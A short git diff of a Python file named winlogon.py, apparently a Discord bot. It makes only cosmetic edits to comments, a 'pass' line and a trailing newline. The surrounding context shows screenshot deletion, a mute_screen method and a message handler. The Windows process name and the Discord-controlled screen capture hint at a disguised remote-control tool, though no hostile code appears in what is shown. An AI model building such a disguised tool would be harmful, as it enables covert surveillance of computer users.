diff --git a/src/main/python/winlogon.py b/src/main/python/winlogon.py index 678f20d..f26a0ce 100644 --- a/src/main/python/winlogon.py +++ b/src/main/python/winlogon.py @@ -8,7 +8,7 @@ from re import split, findall from datetime import datetime -# import time as time_class +# import time from discord.ext import commands from discord import Game, Embed @@ -120,8 +120,9 @@ async def delete_screen(): await asyncio.sleep(0.5) # print("I couldn't delete screen!") else: - pass # print("exist - " + str(File.exist("screen.png"))) + pass + @staticmethod async def mute_screen(): @@ -1456,4 +1457,4 @@ async def on_message(message): print("Ошибка") -client.run(token) \ No newline at end of file +client.run(token)